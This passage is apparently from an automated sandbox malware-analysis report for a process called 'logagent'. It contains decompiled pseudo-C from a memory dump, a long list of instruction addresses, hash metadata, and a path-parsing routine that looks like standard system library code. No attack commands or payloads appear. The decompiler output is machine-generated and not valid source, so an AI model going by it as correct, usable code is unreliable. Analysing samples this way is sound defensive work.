														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E051FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E051FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E051FF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05284CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0520D130(_t427, _t494, _t511);
				}
			}










































































                                              0x05285ba5
                                              0x05285baa
                                              0x05285baf
                                              0x05285bb4
                                              0x05285bb6
                                              0x05285bbc
                                              0x05285bbe
                                              0x05285bc4
                                              0x05285bcd
                                              0x05285bd3
                                              0x05285bd6
                                              0x05285bdc
                                              0x05285be0
                                              0x05285be3
                                              0x05285beb
                                              0x05285bf2
                                              0x05285bf8
                                              0x05285bfe
                                              0x05285c04
                                              0x05285c0e
                                              0x05285c18
                                              0x05285c1f
                                              0x05285c25
                                              0x05285c2a
                                              0x05285c2c
                                              0x05285c32
                                              0x05285c3a
                                              0x05285c3f
                                              0x05285c42
                                              0x05285c48
                                              0x05285c5b
                                              0x05285c5b
                                              0x05285c2c
                                              0x05285cb7
                                              0x05285cb9
                                              0x05285cbf
                                              0x05285cc2
                                              0x05285cca
                                              0x05285ccb
                                              0x05285ccb
                                              0x05285cd1
                                              0x05285cd7
                                              0x05285cda
                                              0x05285ce1
                                              0x05285ce4
                                              0x05285ce7
                                              0x05285ced
                                              0x05285cf3
                                              0x05285cf9
                                              0x05285cff
                                              0x05285d08
                                              0x05285d0a
                                              0x05285d0e
                                              0x05285d10
                                              0x00000000
                                              0x00000000
                                              0x05285d16
                                              0x05285d1a
                                              0x00000000
                                              0x00000000
                                              0x05285d20
                                              0x05285d22
                                              0x05285d25
                                              0x05285d2f
                                              0x05285d2f
                                              0x05285d33
                                              0x05285d3d
                                              0x05285d49
                                              0x05285d4b
                                              0x00000000
                                              0x00000000
                                              0x05285d5a
                                              0x05285d5d
                                              0x05285d60
                                              0x00000000
                                              0x00000000
                                              0x05285d66
                                              0x05285d69
                                              0x00000000
                                              0x00000000
                                              0x05285d6f
                                              0x05285d6f
                                              0x05285d73
                                              0x05285d79
                                              0x05285d7f
                                              0x05285d86
                                              0x05285d95
                                              0x05285d98
                                              0x05285dba
                                              0x05285dcb
                                              0x05285dce
                                              0x05285dd3
                                              0x05285dd6
                                              0x05285dd8
                                              0x05285de6
                                              0x05285dec
                                              0x05285dee
                                              0x05285df1
                                              0x05285df3
                                              0x0528635a
                                              0x0528635a
                                              0x00000000
                                              0x0528635a
                                              0x05285dfe
                                              0x05285e02
                                              0x05285e05
                                              0x05285e07
                                              0x05285e10
                                              0x05285e13
                                              0x05285e1b
                                              0x05285e1c
                                              0x05285e21
                                              0x05285e22
                                              0x05285e23
                                              0x05285e25
                                              0x05285e2a
                                              0x05285e2c
                                              0x05285e2e
                                              0x05285e36
                                              0x05285e39
                                              0x05285e42
                                              0x05285e47
                                              0x05285e4d
                                              0x05285e54
                                              0x05285e54
                                              0x05285e54
                                              0x05285e2e
                                              0x05285e5c
                                              0x05285e5f
                                              0x05285e62
                                              0x05285e64
                                              0x05285e6b
                                              0x05285e70
                                              0x05285e7a
                                              0x05285e7a
                                              0x05285e7a
                                              0x05285e6b
                                              0x05285e7e
                                              0x05285e7f
                                              0x05285e7f
                                              0x05285e81
                                              0x05285e87
                                              0x05285e8b
                                              0x05285e8c
                                              0x05285e8c
                                              0x05285e8c
                                              0x05285e9a
                                              0x05285e9c
                                              0x05285ea2
                                              0x05285ea6
                                              0x05285f50
                                              0x05285f50
                                              0x05285f57
                                              0x05285f66
                                              0x05285f66
                                              0x05285f66
                                              0x05285f68
                                              0x05285f6a
                                              0x052863d0
                                              0x00000000
                                              0x05285f70
                                              0x05285f70
                                              0x05285f91
                                              0x05285f9c
                                              0x05285f9e
                                              0x05285fa4
                                              0x05285fa6
                                              0x0528638c
                                              0x05286392
                                              0x052863a1
                                              0x052863a7
                                              0x052863af
                                              0x052863af
                                              0x052863bd
                                              0x052863d8
                                              0x00000000
                                              0x052863d8
                                              0x05285fac
                                              0x05285fb2
                                              0x05285fb4
                                              0x05285fbd
                                              0x05285fc6
                                              0x05285fce
                                              0x05285fd4
                                              0x05285fdc
                                              0x05285fec
                                              0x05285fed
                                              0x05285fee
                                              0x05285fef
                                              0x05285ff9
                                              0x05285ffa
                                              0x05285ffb
                                              0x05285ffc
                                              0x05286000
                                              0x05286004
                                              0x05286012
                                              0x05286012
                                              0x05286018
                                              0x05286019
                                              0x0528601a
                                              0x0528601b
                                              0x0528601c
                                              0x05286020
                                              0x05286059
                                              0x0528605c
                                              0x05286061
                                              0x05286061
                                              0x05286022
                                              0x05286022
                                              0x05286022
                                              0x05286025
                                              0x0528602a
                                              0x0528602b
                                              0x05286031
                                              0x05286037
                                              0x05286038
                                              0x0528603e
                                              0x05286048
                                              0x05286049
                                              0x0528604a
                                              0x0528604b
                                              0x0528604c
                                              0x0528604d
                                              0x05286053
                                              0x05286054
                                              0x05286054
                                              0x05286062
                                              0x05286065
                                              0x05286067
                                              0x0528606a
                                              0x05286070
                                              0x05286075
                                              0x05286076
                                              0x05286081
                                              0x05286087
                                              0x05286095
                                              0x05286099
                                              0x0528609e
                                              0x052860a4
                                              0x052860ae
                                              0x052860b0
                                              0x052860b3
                                              0x052860b6
                                              0x052860b8
                                              0x052860ba
                                              0x052860ba
                                              0x052860ba
                                              0x052860ba
                                              0x052860be
                                              0x052860c0
                                              0x052860c5
                                              0x052860c5
                                              0x052860c5
                                              0x052860c6
                                              0x052860cd
                                              0x05286114
                                              0x052860cf
                                              0x052860cf
                                              0x052860d4
                                              0x052860d5
                                              0x052860da
                                              0x052860db
                                              0x052860e1
                                              0x052860e2
                                              0x052860e8
                                              0x052860f8
                                              0x052860fd
                                              0x052860fe
                                              0x05286102
                                              0x05286104
                                              0x05286107
                                              0x05286109
                                              0x0528610b
                                              0x0528610b
                                              0x0528610b
                                              0x0528610b
                                              0x0528610f
                                              0x0528610f
                                              0x05286117
                                              0x0528611a
                                              0x0528611f
                                              0x05286125
                                              0x05286134
                                              0x05286139
                                              0x0528613f
                                              0x05286146
                                              0x05286148
                                              0x0528614b
                                              0x0528614d
                                              0x0528614f
                                              0x0528614f
                                              0x0528614f
                                              0x0528614f
                                              0x05286153
                                              0x05286159
                                              0x05286159
                                              0x0528615c
                                              0x05286163
                                              0x05286169
                                              0x0528616c
                                              0x05286172
                                              0x05286181
                                              0x05286186
                                              0x05286187
                                              0x0528618b
                                              0x05286191
                                              0x05286195
                                              0x052861a3
                                              0x052861bb
                                              0x052861c0
                                              0x052861c3
                                              0x052861cc
                                              0x052861d0
                                              0x052861dc
                                              0x052861de
                                              0x052861e1
                                              0x052861e4
                                              0x052861e6
                                              0x052861e8
                                              0x052861e8
                                              0x052861e8
                                              0x052861e8
                                              0x052861e6
                                              0x052861ec
                                              0x052861f3
                                              0x05286203
                                              0x05286209
                                              0x0528620a
                                              0x05286216
                                              0x0528621d
                                              0x05286227
                                              0x05286241
                                              0x05286246
                                              0x0528624c
                                              0x05286257
                                              0x05286259
                                              0x0528625c
                                              0x0528625e
                                              0x05286260
                                              0x05286260
                                              0x05286260
                                              0x05286260
                                              0x0528625e
                                              0x05286264
                                              0x05286267
                                              0x05286269
                                              0x05286315
                                              0x05286315
                                              0x0528631b
                                              0x0528631e
                                              0x05286324
                                              0x05286327
                                              0x0528632f
                                              0x05286330
                                              0x05286333
                                              0x0528633a
                                              0x0528633c
                                              0x05286335
                                              0x05286335
                                              0x05286335
                                              0x0528633f
                                              0x05286342
                                              0x0528634c
                                              0x05286352
                                              0x05286355
                                              0x05286355
                                              0x05286359
                                              0x00000000
                                              0x0528626f
                                              0x05286275
                                              0x05286275
                                              0x05286278
                                              0x0528627e
                                              0x0528627e
                                              0x05286281
                                              0x05286287
                                              0x0528628d
                                              0x05286298
                                              0x0528629c
                                              0x052862a2
                                              0x0528629e
                                              0x0528629e
                                              0x0528629e
                                              0x052862a7
                                              0x052862a7
                                              0x052862aa
                                              0x052862b0
                                              0x052862f0
                                              0x052862f0
                                              0x052862f2
                                              0x052862f8
                                              0x052862fd
                                              0x052862b2
                                              0x052862b2
                                              0x052862b2
                                              0x052862b5
                                              0x052862dd
                                              0x052862e2
                                              0x052862e5
                                              0x052862b7
                                              0x052862b8
                                              0x052862bb
                                              0x052862bd
                                              0x052862c0
                                              0x052862c4
                                              0x052862cd
                                              0x052862cd
                                              0x052862c0
                                              0x052862bb
                                              0x052862b5
                                              0x05286302
                                              0x05286303
                                              0x05286305
                                              0x05286305
                                              0x05286305
                                              0x0528630c
                                              0x0528630c
                                              0x00000000
                                              0x0528627e
                                              0x05286269
                                              0x05285eac
                                              0x05285ebb
                                              0x05285ebe
                                              0x05285ecb
                                              0x05285ecb
                                              0x05285ece
                                              0x05285ece
                                              0x05285ed4
                                              0x05285ed7
                                              0x05285ed9
                                              0x05285edb
                                              0x05285edb
                                              0x05285ee1
                                              0x05285ee1
                                              0x05285ee3
                                              0x05285f20
                                              0x05285f20
                                              0x05285ee5
                                              0x05285ee5
                                              0x05285ee5
                                              0x05285ee8
                                              0x05285f11
                                              0x05285f18
                                              0x05285eea
                                              0x05285eea
                                              0x05285eed
                                              0x05285ef2
                                              0x05285ef8
                                              0x05285efb
                                              0x05285f0a
                                              0x05285f0a
                                              0x05285eed
                                              0x05285ee8
                                              0x05285f22
                                              0x05285f28
                                              0x00000000
                                              0x00000000
                                              0x05285f30
                                              0x05285f31
                                              0x05285f37
                                              0x05285f3a
                                              0x05285f3d
                                              0x05285f44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05285f46
                                              0x05285f48
                                              0x05285f4d
                                              0x00000000
                                              0x05285f4d
                                              0x05285dda
                                              0x05285ddf
                                              0x00000000
                                              0x05285ddf
                                              0x05285dd8
                                              0x05285da7
                                              0x05285da9
                                              0x05285dac
                                              0x05285dae
                                              0x00000000
                                              0x05285db4
                                              0x05285db4
                                              0x00000000
                                              0x05285db4
                                              0x05285dae
                                              0x05285d88
                                              0x05285d8d
                                              0x05286363
                                              0x05286369
                                              0x0528636a
                                              0x05286370
                                              0x05286372
                                              0x0528637a
                                              0x0528637b
                                              0x0528637d
                                              0x00000000
                                              0x00000000
                                              0x0528637f
                                              0x05286385
                                              0x00000000
                                              0x05286385
                                              0x05285d38
                                              0x05285d3b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05285d3b
                                              0x05285d27
                                              0x05285d29
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05286360
                                              0x00000000
                                              0x05286360
                                              0x05285c10
                                              0x05285c10
                                              0x052863da
                                              0x052863e5
                                              0x052863e5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15c648d4bde8dae0d01ce3da82d5d897016c5e946406e81658558e2faa1e0daa
                                              • Instruction ID: 6bfce426d8dec6a31351f25ddbaecbddde5e26904588a417272a0c595205c247
                                              • Opcode Fuzzy Hash: 15c648d4bde8dae0d01ce3da82d5d897016c5e946406e81658558e2faa1e0daa
                                              • Instruction Fuzzy Hash: BC426F71E2121ADFDB24DFA8C840BA9B7B1FF55304F1481AAD94DAB382D770A985CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051D6E30 Relevance: .5, Instructions: 481COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E051D6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x528fca8);
				_push(0x52017f0);
				_push( *[fs:0x0]);
				_t312 =  *0x52ad360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E051FFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E051D74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E051E9BC6( &_v52, 0x5191080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E051F9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E052346A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M051D749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E051B52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L051C2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L051C2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L05234735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E051FBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E051E2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L05234658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E051E9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E051B52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L051B83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E051B52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L051B83AE(_t428);
														L80:
														E051E9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x5191080;
														_v72 =  *0x5191080;
														__eax =  *0x5191084;
														_v68 =  *0x5191084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E051E9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E051D746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
